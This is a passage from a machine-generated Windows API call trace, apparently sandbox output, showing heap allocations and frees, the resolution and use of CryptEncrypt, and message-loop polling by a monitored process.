(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e558d8 [0142.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0142.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0142.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0142.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c38 [0142.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0142.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.468] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0142.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54490 [0142.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0142.469] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9786e0*, pdwDataLen=0x8cef60*=0x11a, dwBufLen=0x120 | out: pbData=0x9786e0*, pdwDataLen=0x8cef60*=0x120) returned 1 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e55960 [0142.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0142.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0142.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0142.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0142.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.473] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0142.473] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0142.473] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0142.473] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0142.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0142.474] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 